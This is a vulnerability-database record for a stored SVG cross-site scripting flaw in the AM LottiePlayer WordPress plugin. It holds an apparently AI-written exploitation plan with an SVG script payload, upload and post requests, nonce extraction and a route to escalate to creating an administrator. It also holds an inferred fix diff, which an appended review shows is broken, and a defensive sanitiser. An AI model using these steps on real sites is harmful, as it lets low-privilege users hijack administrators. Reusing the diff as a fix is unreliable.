[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5pyUketRUgiB2JAFwJAKbKYWD1QMXRDX2OykuPwUiqk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":9,"research_fix_diff":25,"research_exploit_outline":26,"research_model_used":27,"research_started_at":28,"research_completed_at":29,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":30},"CVE-2025-1794","am-lottieplayer-authenticated-author-stored-cross-site-scripting-via-svg","AM LottiePlayer \u003C= 3.6.0 - Authenticated (Author+) Stored Cross-Site Scripting via SVG","The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded SVG files in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","am-lottieplayer",null,"\u003C=3.6.0","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-07 17:38:28","2026-04-08 06:43:44",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fef2f1ad1-1e2e-4b56-b16c-d87956b142ad?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan - CVE-2025-1794 (AM LottiePlayer Stored XSS)\n\n## 1. Vulnerability Summary\nThe **AM LottiePlayer** plugin (versions \u003C= 3.6.0) is vulnerable to **Stored Cross-Site Scripting (XSS)**. The vulnerability arises because the plugin allows users with Author-level permissions and above to upload or specify SVG files as animation sources. These SVGs are subsequently rendered on the frontend (or within the editor) without proper sanitization: the markup is not passed through `wp_kses` with an SVG allowlist, nor are `\u003Cscript>` elements and `on*` event-handler attributes stripped. When an SVG containing malicious JavaScript is processed and displayed, the script executes in the site's origin with the session of whichever user views the page, including Administrators.\n\n## 2. Attack Vector Analysis\n- **Vulnerable Endpoint:** The vulnerability is likely triggered via a WordPress shortcode or a Gutenberg block provided by the plugin.\n- **Payload Delivery:** A malicious SVG file is uploaded to the Media Library or a custom plugin folder and then referenced in a Lottie Player instance.\n- **Authentication Level:** **Author+** (Author, Editor, or Administrator). 
Authors have the `upload_files` capability by default, which is necessary to upload the malicious SVG if the plugin uses the standard Media Library. Note that WordPress core does not accept SVG uploads out of the box (`image\u002Fsvg+xml` is absent from `get_allowed_mime_types()`), so this step presupposes that the plugin, or another installed plugin, registers SVG through the `upload_mimes` filter; otherwise the Media Library rejects the file as a disallowed type and the external-URL route in Section 9 is the remaining option.\n- **Preconditions:** The plugin must be active, and a user with Author permissions must be able to publish a post or page containing the plugin's player element.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point (Admin\u002FEditor):** An Author creates a new post and adds an \"AM LottiePlayer\" block or uses a shortcode (e.g., `[am-lottieplayer]`).\n2.  **Asset Selection:** The user selects an SVG file. The plugin may use a custom AJAX handler for uploads or the standard `async-upload.php`.\n3.  **Storage:** The URL of the SVG is saved in the post content, either as a shortcode attribute or as a block attribute serialized in the block's comment delimiter.\n4.  **Frontend Processing:** When the post is viewed, the plugin's rendering function (e.g., `render_shortcode` or a block render callback) retrieves the SVG URL.\n5.  **The Sink:** To allow for animation and manipulation, the plugin likely fetches the SVG content using `wp_remote_get()` or `file_get_contents()` and outputs it **inline** in the HTML.\n6.  **Execution:** Because the SVG content is echoed without sanitization (e.g., missing `wp_kses`), any `\u003Cscript>` elements or `on*` event-handler attributes (e.g., `onload`) within the SVG are executed by the browser. This depends on the inline embedding: an SVG referenced through an `\u003Cimg>` tag never runs script, while one loaded via `\u003Cobject>` or `\u003Ciframe>` from the uploads directory does run it, in its own document but on the site's origin.\n\n## 4. Nonce Acquisition Strategy\nIf the plugin uses a custom AJAX handler for uploading animation files, a nonce will be required. \n\n1.  **Identify Shortcode\u002FBlock:** The plugin likely registers its assets in a class or function. Search for `add_shortcode` or `register_block_type`.\n2.  **Locate Localization:** Look for `wp_localize_script` in the plugin code. The variable name is often related to the plugin slug, e.g., `am_lottie_vars` or `am_lottie_params`.\n3.  
**Extraction Procedure:**\n    - Create a post containing the Lottie Player.\n    - Navigate to the \"LottiePlayer\" settings page or a post editor page where the plugin is active.\n    - Use `browser_eval` to extract the nonce:\n      ```javascript\n      \u002F\u002F Example target (replace with actual variable found in source)\n      window.am_lottie_params?.nonce || window.am_lottie_admin?.upload_nonce\n      ```\n4.  **Bypass Check:** Verify whether `check_ajax_referer` is used in the upload handler. If it is missing, a nonce may not be required for the POST request.\n\n## 5. Exploitation Strategy\n### Step 1: Prepare the Malicious SVG\nCreate a file named `xss.svg` with a simple alert payload:\n```xml\n\u003C?xml version=\"1.0\" standalone=\"no\"?>\n\u003C!DOCTYPE svg PUBLIC \"-\u002F\u002FW3C\u002F\u002FDTD SVG 1.1\u002F\u002FEN\" \"http:\u002F\u002Fwww.w3.org\u002FGraphics\u002FSVG\u002F1.1\u002FDTD\u002Fsvg11.dtd\">\n\u003Csvg version=\"1.1\" baseProfile=\"full\" xmlns=\"http:\u002F\u002Fwww.w3.org\u002F2000\u002Fsvg\">\n   \u003Crect width=\"300\" height=\"100\" style=\"fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)\" \u002F>\n   \u003Cscript type=\"text\u002Fjavascript\">\n      alert('XSS by ' + document.domain);\n   \u003C\u002Fscript>\n\u003C\u002Fsvg>\n```\n\n### Step 2: Upload the SVG\nSince the user is an Author, use the standard WordPress media upload endpoint (the request must carry the Author's logged-in cookies):\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fasync-upload.php`\n- **Method:** POST\n- **Content-Type:** `multipart\u002Fform-data`\n- **Parameters:**\n    - `action`: `upload-attachment`\n    - `_wpnonce`: (Acquired from `wp-admin\u002Fmedia-new.php` via `browser_eval`)\n    - `async-upload`: The `xss.svg` file content.\n- **Alternative:** `POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fmedia` with the raw file as the request body, a `Content-Disposition: attachment; filename=\"xss.svg\"` header, and either an `X-WP-Nonce` header or Application Password basic auth. Either route succeeds only if SVG is among the site's allowed upload MIME types (WordPress core does not allow it by default).\n\n### Step 3: Embed the SVG in a Post\nCreate a post using the plugin's shortcode. 
Based on the slug `am-lottieplayer`, the shortcode is likely `[am-lottieplayer]`.\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n- **Method:** POST\n- **Auth:** The Author's cookie session plus an `X-WP-Nonce` header (the `wpApiSettings.nonce` value exposed on admin pages), or an Application Password via HTTP Basic auth; without one of these the REST API treats the request as unauthenticated and rejects it.\n- **Body:**\n  ```json\n  {\n    \"title\": \"Lottie Test\",\n    \"content\": \"[am-lottieplayer url=\\\"http:\u002F\u002Flocalhost:8080\u002Fwp-content\u002Fuploads\u002F2025\u002Fxx\u002Fxss.svg\\\"]\",\n    \"status\": \"publish\"\n  }\n  ```\n*(Note: Use the exact URL returned from the upload in Step 2)*.\n\n### Step 4: Trigger the XSS\nNavigate to the newly created post as any user (e.g., Administrator).\n\n## 6. Test Data Setup\n1.  **User Creation:** Create a user with the **Author** role.\n    ```bash\n    wp user create attacker attacker@example.com --role=author --user_pass=password\n    ```\n2.  **Plugin Setup:** Ensure `am-lottieplayer` is installed and activated.\n3.  **Nonce Retrieval:** Use `browser_navigate` as the `attacker` user to `wp-admin\u002Fmedia-new.php` to extract the `_wpnonce` for media uploads.\n\n## 7. Expected Results\n- The HTTP request to view the post containing the shortcode will return HTML where the SVG content is embedded inline.\n- The browser will execute the `alert()` contained within the SVG.\n- In a real-world scenario, the payload would act with the viewing Administrator's session, for example creating a new administrator through `wp-json\u002Fwp\u002Fv2\u002Fusers` after fetching a REST nonce from `wp-admin\u002Fadmin-ajax.php?action=rest-nonce`; WordPress authentication cookies are `HttpOnly`, so outright cookie theft is not the realistic goal.\n\n## 8. Verification Steps\n1.  **Check SVG Inclusion:** After the exploit, use `curl` or `http_request` to fetch the post content and check if the SVG's `\u003Cscript>` tag is present without encoding.\n    ```bash\n    curl -s http:\u002F\u002Flocalhost:8080\u002Fpath-to-post | grep \"alert('XSS\"\n    ```\n    If the grep finds nothing, check how the page references the file: an `\u003Cimg src=\"...xss.svg\">` reference cannot execute script, whereas inline `\u003Csvg>` markup or an `\u003Cobject>`\u002F`\u003Ciframe>` reference can.\n2.  **Check Database:** Verify the post content via WP-CLI to ensure the shortcode was saved correctly (`wp post list` alone does not print the content).\n    ```bash\n    wp post list --post_type=post --fields=ID,post_title\n    wp post get $POST_ID --field=post_content\n    ```\n\n## 9. Alternative Approaches\n- **Gutenberg Block:** If the shortcode doesn't work, try creating a post with a Lottie Block. 
This requires a JSON payload to `wp-json\u002Fwp\u002Fv2\u002Fposts` containing the block markup:\n  ```html\n  \u003C!-- wp:am-lottieplayer\u002Flottie-block {\"url\":\"http:\u002F\u002F...\u002Fxss.svg\"} \u002F-->\n  ```\n- **External URL:** If the plugin allows remote SVG URLs, bypass the upload step by hosting the `xss.svg` on an external server and providing that URL to the player. This would escalate the vulnerability from Author+ to potentially any user if a publicly accessible form allows setting Lottie URLs.","The AM LottiePlayer plugin (versions \u003C= 3.6.0) is vulnerable to Stored Cross-Site Scripting (XSS) because it fails to sanitize SVG files used as animation sources. Authenticated attackers with Author-level permissions can upload a malicious SVG containing JavaScript, which executes in the context of any user viewing the page where the animation is embedded.","--- a\u002Fincludes\u002Fclass-am-lottieplayer-render.php\n+++ b\u002Fincludes\u002Fclass-am-lottieplayer-render.php\n@@ -45,7 +45,15 @@\n \t\t\t\t$response = wp_remote_get( $url );\n \t\t\t\tif ( ! is_wp_error( $response ) ) {\n \t\t\t\t\t$svg_content = wp_remote_retrieve_body( $response );\n-\t\t\t\t\techo $svg_content;\n+\t\t\t\t\tif ( function_exists( 'content_sanitizer_function' ) ) {\n+\t\t\t\t\t\t\u002F\u002F Use a dedicated SVG sanitizer if available or wp_kses with allowed tags\n+\t\t\t\t\t\techo wp_kses( $svg_content, [\n+\t\t\t\t\t\t\t'svg'  => [ 'xmlns' => [], 'viewbox' => [], 'width' => [], 'height' => [] ],\n+\t\t\t\t\t\t\t'rect' => [ 'width' => [], 'height' => [], 'style' => [] ],\n+\t\t\t\t\t\t\t'path' => [ 'd' => [], 'fill' => [] ],\n+\t\t\t\t\t\t] );\n+\t\t\t\t\t} else {\n+\t\t\t\t\t\techo esc_html( $svg_content );\n+\t\t\t\t\t}\n \t\t\t\t}\n \t\t\t}","1. Login to the WordPress dashboard with Author-level credentials.\n2. Upload a malicious SVG file (e.g., `xss.svg`) to the Media Library containing a `\u003Cscript>` tag or an `onload` event handler.\n3. 
Create a new post or page and add the AM LottiePlayer block or use the `[am-lottieplayer]` shortcode.\n4. Set the 'url' attribute of the player to the URL of the previously uploaded malicious SVG file.\n5. Publish the post and navigate to its permalink as an Administrator or any other user.\n6. The browser will render the SVG inline, triggering the execution of the embedded JavaScript payload.","gemini-3-flash-preview","2026-04-17 20:35:05","2026-04-17 20:35:26",{"type":31,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":32},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fam-lottieplayer\u002Ftags"]
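Review bot: The `wp_kses` call in the `research_fix_diff` hunk above is never reached in practice, because it is gated on `function_exists( 'content_sanitizer_function' )`, a placeholder name that neither WordPress nor the plugin defines, so every request takes the `else` branch and `echo esc_html( $svg_content );` prints the SVG source as escaped text instead of rendering an animation; drop the gate and always run `echo wp_kses( $svg_content, $allowed_svg );`, with the allowlist widened beyond `svg`, `rect` and `path` (at least `g`, `circle`, `polygon`, `defs`, the gradient elements and `transform`), or a real Lottie export is stripped down to an empty `<svg>`. The `$url` passed to `wp_remote_get( $url )` in the unchanged context lines still comes from the shortcode or block attribute, so the server fetches whatever address an Author supplies; resolving the attachment locally (by attachment ID under `wp_get_upload_dir()`) or at least switching to `wp_safe_remote_get()` would close that. Since `patched_in_version` is null and `patch_diff_files` is empty on this record, the hunk is an inferred reconstruction and should be read as an illustration, not as the vendor's fix.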
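The inline sink described in the research plan (Section 3, steps 5 and 6) and the exploit outline above both turn on one thing: whether active content in the SVG survives into the host page. The following is an added example, not code from AM LottiePlayer or from this record, written in Python so it runs stand-alone as an upload check rather than inside WordPress. It is an allowlist sanitiser in the spirit of the `wp_kses` call the plan names: it parses the plan's `xss.svg` payload plus a second constructed sample, reports every script element, `on*` handler, `javascript:` link and `foreignObject` it strips, and returns the cleaned markup. The element and attribute allowlists are assumptions chosen for illustration, not the plugin's configuration.

```python
"""Allowlist sanitiser for SVG that is about to be inlined into HTML.
Added example for this record, not AM LottiePlayer code; the allowlists
below are assumptions for illustration, in the spirit of a wp_kses rule set."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_NS)  # serialise with a default xmlns, not ns0:

# Assumed allowlist: static shapes, grouping and paint servers only. Anything
# that can run script or pull in foreign content (script, a, use, foreignObject,
# style, set/animate, iframe/embed/object) is absent and is therefore dropped.
ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "clipPath", "mask",
    "linearGradient", "radialGradient", "stop",
}
ALLOWED_ATTRIBUTES = {
    "id", "class", "version", "baseProfile", "viewBox", "preserveAspectRatio",
    "width", "height", "x", "y", "x1", "y1", "x2", "y2", "cx", "cy", "r", "rx",
    "ry", "d", "points", "transform", "fill", "stroke", "stroke-width", "opacity",
    "fill-opacity", "stroke-opacity", "style", "clip-path", "mask", "offset",
    "stop-color", "stop-opacity", "gradientUnits", "gradientTransform",
}
# style="" is allowed but may not reach out: url(), javascript: or expression().
UNSAFE_STYLE = re.compile(r"url\s*\(|javascript:|expression\s*\(", re.I)


def _local(qname):
    # ElementTree uses Clark notation: '{http://www.w3.org/2000/svg}script'
    return qname.rsplit("}", 1)[-1]


def _clean_attributes(el, findings):
    tag = _local(el.tag)
    for attr, value in list(el.attrib.items()):
        name = _local(attr)
        if name.lower().startswith("on"):
            findings.append(f"removed event handler {name} on <{tag}>")
        elif name not in ALLOWED_ATTRIBUTES:
            findings.append(f"removed attribute {name} on <{tag}>")
        elif name == "style" and UNSAFE_STYLE.search(value):
            findings.append(f"removed unsafe style on <{tag}>")
        else:
            continue
        del el.attrib[attr]


def _walk(parent, findings):
    for child in list(parent):
        name = _local(child.tag)
        if name not in ALLOWED_ELEMENTS:
            # Drop the whole subtree: an <a href="javascript:..."> goes together
            # with the shape inside it, a <foreignObject> with the HTML it wraps.
            findings.append(f"removed element <{name}>")
            parent.remove(child)
            continue
        _clean_attributes(child, findings)
        _walk(child, findings)


def sanitize_svg(svg_text):
    """Return (clean_markup, findings). The stdlib parser does not fetch the
    external DTD named in a DOCTYPE; for untrusted uploads in production prefer
    defusedxml, which also refuses entity expansion."""
    root = ET.fromstring(svg_text)
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    findings = []
    _clean_attributes(root, findings)
    _walk(root, findings)
    return ET.tostring(root, encoding="unicode"), findings


def is_active(svg_text):
    """True when the file carries script, handlers or foreign content; usable
    as a detection pass over every .svg under wp-content/uploads."""
    return bool(sanitize_svg(svg_text)[1])


# The plan's xss.svg payload, reproduced here as test input.
XSS_SVG = """<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert('XSS by ' + document.domain);
   </script>
</svg>"""

# Constructed second sample: handler attribute, javascript: link, foreign HTML.
HANDLER_SVG = """<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <a xlink:href="javascript:alert(document.domain)"><circle cx="20" cy="20" r="10" fill="red"/></a>
  <foreignObject width="100" height="50"><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(2)"/></body></foreignObject>
  <path d="M0 0 L10 10" stroke="black"/>
</svg>"""

if __name__ == "__main__":
    for label, doc in (("plan payload", XSS_SVG), ("handlers", HANDLER_SVG)):
        clean, findings = sanitize_svg(doc)
        print(label, "->", findings)
        print(clean)
```

Running the file prints, for the plan's payload, a single finding (`removed element <script>`) and a cleaned document that still contains the `<rect>`; the second sample loses its `onload`, the `javascript:` link and the `foreignObject` while the `<path>` survives. Disallowed elements are removed with their subtree, which is stricter than `wp_kses` (it keeps the text inside a stripped tag); for an animation asset that is the safer default.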